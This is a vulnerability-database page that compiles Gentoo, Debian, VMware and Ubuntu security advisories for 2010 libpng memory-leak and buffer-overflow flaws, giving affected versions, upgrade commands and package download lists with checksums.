Search criteria
ⓘ
Use full-text search for keyword queries.
Combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by dates instead of relevance.
123 vulnerabilities found for libpng by libpng
VAR-201006-0260
Vulnerability from variot - Updated: 2026-04-10 22:45Memory leak in pngrutil.c in libpng before 1.2.44, and 1.4.x before 1.4.3, allows remote attackers to cause a denial of service (memory consumption and application crash) via a PNG image containing malformed Physical Scale (aka sCAL) chunks. The 'libpng' library is prone to multiple vulnerabilities. Successful exploits may allow remote attackers to cause denial-of-service conditions or potentially execute arbitrary code on computers running the affected library. These issues affect versions prior to 'libpng' 1.4.3 and 1.2.44.
Background
libpng is a standard library used to process PNG (Portable Network Graphics) images. It is used by several programs, including web browsers and potentially server processes.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/libpng < 1.4.3 >= 1.4.3
Description
Multiple vulnerabilities were found in libpng:
-
The png_decompress_chunk() function in pngrutil.c does not properly handle certain type of compressed data (CVE-2010-0205)
-
A buffer overflow in pngread.c when using progressive applications (CVE-2010-1205)
-
A memory leak in pngrutil.c when dealing with a certain type of chunks (CVE-2010-2249)
Impact
An attacker could exploit these vulnerabilities to cause programs linked against the library to crash or execute arbitrary code with the permissions of the user running the vulnerable program, which could be the root user.
Workaround
There is no known workaround at this time.
Resolution
All libpng users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libpng-1.4.3"
References
[ 1 ] CVE-2010-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205 [ 2 ] CVE-2010-1205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205 [ 3 ] CVE-2010-2249 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201010-01.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
For the testing (squeeze) and unstable (sid) distribution, these problems have been fixed in version 1.2.44-1
We recommend that you upgrade your libpng package.
Upgrade instructions
wget url will fetch the file for you dpkg -i file.deb will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:
apt-get update will update the internal database apt-get upgrade will install corrected packages
You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
Debian (stable)
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny4.dsc Size/MD5 checksum: 1201 518a1f5c30a115dcb732e7499a2cef96 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny4.diff.gz Size/MD5 checksum: 21437 43e68a174233314cf49bb204abdd29b6
Architecture independent packages:
http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny4_all.deb Size/MD5 checksum: 886 94643952b104a6f231ed7d710e2ae95d
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_alpha.deb Size/MD5 checksum: 182808 27b109278c41f9354d529ce0cfa2fe70 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_alpha.deb Size/MD5 checksum: 287316 b05d9032dca244cfbb1773e17eb8fbf3 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_alpha.udeb Size/MD5 checksum: 86558 2082c8b1458c53860b8243c184909d99
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_amd64.udeb Size/MD5 checksum: 71944 a3992e7b18a2897879863fbf70f3e44f http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_amd64.deb Size/MD5 checksum: 167620 b654901994d4666d2918869ef59aef38 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_amd64.deb Size/MD5 checksum: 254780 dfb0d24bf329b004ccea98b3a94186be
arm architecture (ARM)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_arm.udeb Size/MD5 checksum: 64570 f8b22165ed7daf5c40ecff5e03b7c724 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_arm.deb Size/MD5 checksum: 159684 b64a7d362ef23b72d4af94bd48c89e33 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_arm.deb Size/MD5 checksum: 245526 a55f8943e244796a2dbf4b244673d9ab
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_armel.udeb Size/MD5 checksum: 67034 4d6f0fbce281723de483067ae4226f18 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_armel.deb Size/MD5 checksum: 162570 fb1927ecf7521ce2de4c3c2d3d9ba679 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_armel.deb Size/MD5 checksum: 245964 38148590fd5c421c6e7649767ce23556
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_hppa.deb Size/MD5 checksum: 170090 1a9ad8514fb3dd6111090f321553452b http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_hppa.deb Size/MD5 checksum: 260414 b1ada2a28da472703f953547dc2947e2 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_hppa.udeb Size/MD5 checksum: 73894 eb6714f86f8085811a3dc1a1218a75a3
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_i386.deb Size/MD5 checksum: 245468 8b6e9b5424a8991c05734f90b00182a2 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_i386.deb Size/MD5 checksum: 166290 70c41d2feb2aff02be6154cea7cec1f4 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_i386.udeb Size/MD5 checksum: 70118 e7c845ff2e87dc1dc2849ecac4428aa4
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_ia64.udeb Size/MD5 checksum: 111752 9b3c6f30c1d59df47d8f1736cffb5f74 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_ia64.deb Size/MD5 checksum: 207554 ca076c99f9d64729eab9a58632ab2b9e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_ia64.deb Size/MD5 checksum: 305536 0446686bb25783804121efced246e59d
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_mips.deb Size/MD5 checksum: 164086 e615a6007aa89ccd38a1afc482c6c51e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_mips.udeb Size/MD5 checksum: 68180 beec6961eba764cd9186f4ba1e116949 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_mips.deb Size/MD5 checksum: 262216 937b2f2c26200b4a53f0bd8293b80af3
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_mipsel.udeb Size/MD5 checksum: 68464 c0e4a6cf4cbb2d6cda04ae5c0c572dd5 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_mipsel.deb Size/MD5 checksum: 164312 48ec081a3f25a7863fe689a212d37b07 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_mipsel.deb Size/MD5 checksum: 262482 560287e9b0c79a7d51ff4fd37e0a8da4
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_powerpc.deb Size/MD5 checksum: 253154 caa93c1b0d9460d93d7b81241dcd25fb http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_powerpc.udeb Size/MD5 checksum: 70748 59534d8fcb740fdfd681a173a85d72fe http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_powerpc.deb Size/MD5 checksum: 166354 3d521ce5930a7707bb3afc61f7c48ccc
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_s390.udeb Size/MD5 checksum: 73500 bceb1dab986adc60adde49c6bb267e7d http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_s390.deb Size/MD5 checksum: 253036 85ebb3e8ac1749f20e0c45f489f348a6 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_s390.deb Size/MD5 checksum: 169330 aa9808b63b2301f8be657a3c2d6797d2
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_sparc.deb Size/MD5 checksum: 161688 5f12a2df5cea9e05bdad35a18e07f864 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_sparc.udeb Size/MD5 checksum: 66084 bc6933daf2143bcc3f3b8c96e7bc29bb http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_sparc.deb Size/MD5 checksum: 247360 ad0ae85eb3806d0263b985139c3c54ed
These files will probably be moved into the stable distribution on its next update. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
VMware Security Advisory
Advisory ID: VMSA-2010-0014 Synopsis: VMware Workstation, Player, and ACE address several security issues. Issue date: 2010-09-23 Updated on: 2010-09-23 (initial release of advisory) CVE numbers: CVE-2010-3277 CVE-2010-1205 CVE-2010-0205 CVE-2010-2249 CVE-2010-0434 CVE-2010-0425
- Summary
VMware Workstation and Player address a potential installer security issue and security issues in libpng. VMware ACE Management Server (AMS) for Windows updates Apache httpd.
- Relevant releases
VMware Workstation 7.1.1 and earlier, VMware Player 3.1.1 and earlier, VMware ACE Management Server 2.7.1 and earlier,
Note: VMware Server was declared End Of Availability on January 2010, support will be limited to Technical Guidance for the duration of the support term.
- Problem Description
a. VMware Workstation and Player installer security issue
The Workstation 7.x and Player 3.x installers will load an index.htm
file located in the current working directory on which Workstation
7.x or Player 3.x is being installed. This may allow an attacker to
display a malicious file if they manage to get their file onto the
system prior to installation.
The issue can only be exploited at the time that Workstation 7.x or
Player 3.x is being installed. Installed versions of Workstation and
Player are not affected. The security issue is no longer present in
the installer of the new versions of Workstation 7.x and Player 3.x
(see table below for the version numbers).
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-3277 to this issue.
VMware would like to thank Alexander Trofimov and Marc Esher for
independently reporting this issue to VMware.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
VirtualCenter any Windows not affected
Workstation 7.x any 7.1.2 build 301548 or later *
Workstation 6.5.x any not affected
Player 3.x any 3.1.2 build 301548 or later *
Player 2.5.x any not affected
AMS any any not affected
Server any any not affected
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX any ESX not affected
- Note: This only affects the installer, if you have a version of Workstation or Player installed you are not vulnerable.
b. Third party libpng updated to version 1.2.44
A buffer overflow condition in libpng is addressed that could
potentially lead to code execution with the privileges of the
application using libpng. Two potential denial of service issues
are also addressed in the update.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-1205, CVE-2010-0205, CVE-2010-2249
to these issues.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
VirtualCenter any Windows not affected
Workstation 7.1.x any 7.1.2 build 301548 or later
Workstation 6.5.x any affected, patch pending
Player 3.1.x any 3.1.2 build 301548 or later
Player 2.5.x any affected, patch pending
AMS any any not affected
Server any any affected, no patch planned
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX any ESX not affected
c. VMware ACE Management Server (AMS) for Windows updates Apache httpd version 2.2.15.
A function in Apache HTTP Server when multithreaded MPM is used
does not properly handle headers in subrequests in certain
circumstances which may allow remote attackers to obtain sensitive
information via a crafted request that triggers access to memory
locations associated with an earlier request.
The Apache mod_isapi module can be forced to unload a specific
library before the processing of a request is complete, resulting
in memory corruption.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-0434 and CVE-2010-0425 to the
issues addressed in this update.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
VirtualCenter any Windows not affected
Workstation any any not affected
Player any any not affected
AMS any Windows 2.7.2 build 301548 or later
AMS any Linux affected, patch pending *
Server any any not affected
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX any ESX not affected
-
Note CVE-2010-0425 is not applicable to AMS running on Linux
-
Solution Please review the patch/release notes for your product and version and verify the md5sum and/or the sha1sum of your downloaded file.
VMware Workstation 7.1.2
http://www.vmware.com/download/ws/ Release notes: http://downloads.vmware.com/support/ws71/doc/releasenotes_ws712.html
Workstation for Windows 32-bit and 64-bit with VMware Tools
md5sum: 2e9715ec297dc3ca904ad2707d3e2614
sha1sum: 55b2b99f67c3dacd402fb9880999086efd264e7a
Workstation for Windows 32-bit and 64-bit without VMware Tools
md5sum: 066929f59aef46f11f4d9fd6c6b36e4d
sha1sum: def776a28ee1a21b1ad26e836ae868551fff6fc3
VMware Player 3.1.2
http://www.vmware.com/download/player/ Release notes:
http://downloads.vmware.com/support/player31/doc/releasenotes_player312.html
VMware Player for Windows 32-bit and 64-bit
md5sum: 3f289cb33af5e425c92d8512fb22a7ba
sha1sum: bf67240c1f410ebeb8dcb4f6d7371334bf9a6b70
VMware Player for Linux 32-bit
md5sum: 11e3e3e8753e1d9abbbb92c4e3c1dfe8
sha1sum: dd1dbcdb1f4654eefc11472b68934dcb69842749
VMware Player for Linux 64-bit
md5sum: 2ab08e0d4050719845a64d334ca15bb1
sha1sum: f024ad84ec831fce8667dfa9601851da5d9fa59c
VMware ACE Management Server 2.7.2
http://downloads.vmware.com/d/info/desktop_downloads/vmware_ace/2_7 Release notes: http://downloads.vmware.com/support/ace27/doc/releasenotes_ace272.html
ACE Management Server for Windows
md5sum: 02f0072b8e48a98ed914b633f070d550
sha1sum: 94a68eac4a328d21a741879b9d063227c0dc1ce4
- References
CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3277 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0434 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0425
- Change log
2010-09-23 VMSA-2010-0014 Initial security advisory after release of Workstation 7.1.2, Player 3.1.2 and ACE Management Server 2.7.2 on 2010-09-23
- Contact
E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
- security-announce at lists.vmware.com
- bugtraq at securityfocus.com
- full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055
VMware Security Center http://www.vmware.com/security
VMware Security Advisories http://www.vmware.com/security/advisoiries
VMware security response policy http://www.vmware.com/support/policies/security_response.html
General support life cycle policy http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html
Copyright 2010 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)
iEYEARECAAYFAkycSrQACgkQS2KysvBH1xmT9wCfbBUS4GYrJohz+QMLYcoiFmSh eTgAoIAmx+ilbe2myj02daLjFrVQfQII =5jlh -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-960-1 July 08, 2010 libpng vulnerabilities CVE-2010-1205, CVE-2010-2249 ===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS
This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 6.06 LTS: libpng12-0 1.2.8rel-5ubuntu0.6
Ubuntu 8.04 LTS: libpng12-0 1.2.15~beta5-3ubuntu0.3
Ubuntu 9.04: libpng12-0 1.2.27-2ubuntu2.2
Ubuntu 9.10: libpng12-0 1.2.37-1ubuntu0.2
Ubuntu 10.04 LTS: libpng12-0 1.2.42-1ubuntu2.1
After a standard system update you need to reboot your computer to make all the necessary changes.
Details follow:
It was discovered that libpng did not properly handle certain malformed PNG images. If a user or automated system were tricked into opening a crafted PNG file, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-1205)
It was discovered that libpng did not properly handle certain malformed PNG images. If a user or automated system were tricked into processing a crafted PNG image, an attacker could possibly use this flaw to consume all available resources, resulting in a denial of service. (CVE-2010-2249)
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.6.diff.gz
Size/MD5: 24044 8979ca6b113137fe5ee051c1c70571eb
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.6.dsc
Size/MD5: 661 92722fa973e92a99f982fe05b5826adf
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.6_all.deb
Size/MD5: 842 dcbc7d24c8426e3b3024859ec157f57e
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_amd64.deb
Size/MD5: 114528 aea355e99e67b76c9464f8cc49b3560d
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_amd64.deb
Size/MD5: 247576 f0e52e10a663f9b1b04d9371d4a2cf14
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_amd64.udeb
Size/MD5: 69504 6536e83152b2cf00d0d961b9b095c2d5
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_i386.deb
Size/MD5: 112048 b8f85cc6154602422a8841a5cad1a4a1
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_i386.deb
Size/MD5: 239628 fb6f6e62a9fa6114c50946c74cb2ed5d
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_i386.udeb
Size/MD5: 66946 501acb21d567d62608904e4272ff842d
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_powerpc.deb
Size/MD5: 111648 19cccb12fb968f40f04068b9da24f589
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_powerpc.deb
Size/MD5: 245230 ebdbfc860056170b7a165479d7905bb3
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_powerpc.udeb
Size/MD5: 66458 24e918a95770150b4df72530bd6de095
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_sparc.deb
Size/MD5: 109156 510d17affd2c0cf3f5dce5379df57d49
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_sparc.deb
Size/MD5: 240072 1ff11e0649a58bc7b809c86941aaafd7
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_sparc.udeb
Size/MD5: 63882 d7df02c540e66a536cbffca5d02645d5
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.3.diff.gz
Size/MD5: 22755 f5c0ba19b04eba8264ebb6b30c5617d6
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.3.dsc
Size/MD5: 832 d08a82b28411baa0184d3b8231fd8b61
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz
Size/MD5: 829038 77ca14fcee1f1f4daaaa28123bd0b22d
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-3ubuntu0.3_all.deb
Size/MD5: 940 7344fa4e61880636b014525f6e6482a1
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_amd64.deb
Size/MD5: 190186 01f82b2b967c5212e834dd57c12c1a7c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_amd64.deb
Size/MD5: 179752 c26e243dd21f5dd10b478c0415215c1c
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_amd64.udeb
Size/MD5: 70534 5f7628d9b644ae953c515d18f7de9980
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_i386.deb
Size/MD5: 188782 51354007cca0796218e3aaeba6142c41
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_i386.deb
Size/MD5: 171216 b7a092ef2f5955b380adc015bfae6c81
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_i386.udeb
Size/MD5: 69082 7612cd438ddfaab236de5f342f709b66
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_lpia.deb
Size/MD5: 189664 4825baf36c5d14b5066d548aaf050866
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_lpia.deb
Size/MD5: 172962 b16b496d6553fbf28523147617011b95
http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_lpia.udeb
Size/MD5: 70020 61f5d75c4435333ef586677a07d49915
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_powerpc.deb
Size/MD5: 190300 8ac6e4c1efb73de848d5bc5457093e7a
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_powerpc.deb
Size/MD5: 179166 d92637edf805d7d673a4440b2605dc57
http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_powerpc.udeb
Size/MD5: 70604 adf25dd26d85725ab3c74c4a80a7a541
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_sparc.deb
Size/MD5: 185622 ef3cf5486afe387d09bf05106893b371
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_sparc.deb
Size/MD5: 173422 4b2f3476b423a3c5c31ee0738bfb4458
http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_sparc.udeb
Size/MD5: 65928 ab5ac0b24d618dc432d1763a0e50ebda
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.2.diff.gz
Size/MD5: 176459 b2f27af9534f3c5b9a120680cd41ce7c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.2.dsc
Size/MD5: 1296 b66efe2157ab6f3dad6e57b4fe9dbf13
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27.orig.tar.gz
Size/MD5: 783204 13a0de401db1972a8e68f47d5bdadd13
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.27-2ubuntu2.2_all.deb
Size/MD5: 932 1c66e49e2b875fa40c5556c19d076508
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_amd64.udeb
Size/MD5: 72852 a1bbcffd25c3ec87cbdf86be154962fc
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_amd64.deb
Size/MD5: 168576 9f40f2846c21aa5835f53ab6895ec5cf
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_amd64.deb
Size/MD5: 255784 d9060ad287e40ded1848b79284abbcc0
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_i386.udeb
Size/MD5: 71102 c18134055d747d066b60218b69e99d45
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_i386.deb
Size/MD5: 166904 e8151a3f79f0fff6d98bbb0675621594
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_i386.deb
Size/MD5: 247922 ae8412d1c420f1dd63cb436382cad51f
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_lpia.udeb
Size/MD5: 71488 5179307ffe74c10515e61503e647606f
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_lpia.deb
Size/MD5: 167370 dd07d7a09484eb7711da5cd874099abe
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_lpia.deb
Size/MD5: 248872 a34333b123f4d12e7872868111942cbd
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_powerpc.udeb
Size/MD5: 71674 f742f2771d94ca29746906c1177d657d
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_powerpc.deb
Size/MD5: 167514 478378fde5c7fd14fbffa1be072aa21c
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_powerpc.deb
Size/MD5: 254642 ba3f255f4346a4483c5410d55acaac65
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_sparc.udeb
Size/MD5: 66670 ee067298bc51471f06bcf1a74b557310
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_sparc.deb
Size/MD5: 162336 ab167dcdbbd930a3d976af0ad57cbac2
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_sparc.deb
Size/MD5: 248428 8b96f4ff4f0ad8e366ed4475d3890948
Updated packages for Ubuntu 9.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.2.diff.gz
Size/MD5: 20129 f230ec37944a0150ffc83cfdddc7c906
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.2.dsc
Size/MD5: 1293 fce0b2fd543aeff27d47fb91f12af053
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37.orig.tar.gz
Size/MD5: 805380 7480dbbf9f6c3297faf6fe52ec9b91ab
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.37-1ubuntu0.2_all.deb
